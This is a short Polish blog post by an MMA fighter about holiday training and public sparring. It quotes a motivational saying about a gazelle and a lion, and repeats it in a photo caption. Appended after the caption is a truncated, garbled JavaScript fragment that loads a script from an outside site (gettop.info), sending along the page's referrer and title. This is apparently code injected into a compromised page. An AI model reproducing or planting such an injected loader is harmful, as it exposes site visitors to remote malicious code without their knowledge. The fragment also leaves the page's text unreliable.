Przed Sylwestrem na sportowo :)

21.12.2012 / Mariusz Cieśliński

Z końcem roku są organizowane różnego rodzaju biegi sylwestrowe,mecze piłkarskie etc.My postanowiliśmy trochę poobijać swoje „schaby i gnaty”.W ramach poświątecznego pokutowania ewentualnego obżarstwa,robimy sobe sparringi. Oczywiście z publicznością.Doza adrenalinki musi być :)

Mnie świąteczny czas nie zwalnia z treningów.Magia świąt oczywiście,ale trening zrobiony być musi! :)

U Tomka Drwala znalazłem fajny cytat.Ukradłem go i jest pod spodem:

Cytat dla każdego wojownika, nie tylko fightera MMA:

„Każdego ranka, gdzieś w Afryce budzi się gazela wiedząc, że aby
przeżyć musi biegać szybciej od najszybszego lwa. Każdego ranka,
gdzieś w Afryce budzi się lew wiedząc, że aby nie umrzeć z głodu musi biegać szybciej od najwolniejszej gazeli. Nieważne, czy jesteś lwem, czy gazelą – o świcie powinieneś być gotowy do biegu.”

Zdjęcie: Cytat dla każdego wojownika, nie tylko fightera MMA:<br /><br />
"Każdego ranka, gdzieś w Afryce budzi się gazela wiedząc, że aby<br /><br />
przeżyć musi biegać szybciej od najszybszego lwa. Każdego ranka,<br /><br />
gdzieś w Afryce budzi się lew wiedząc, że aby nie umrzeć z głodu musi biegać szybciej od najwolniejszej gazeli. Nieważne, czy jesteś lwem, czy gazelą - o świcie powinieneś być gotowy do biegu."} else {s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';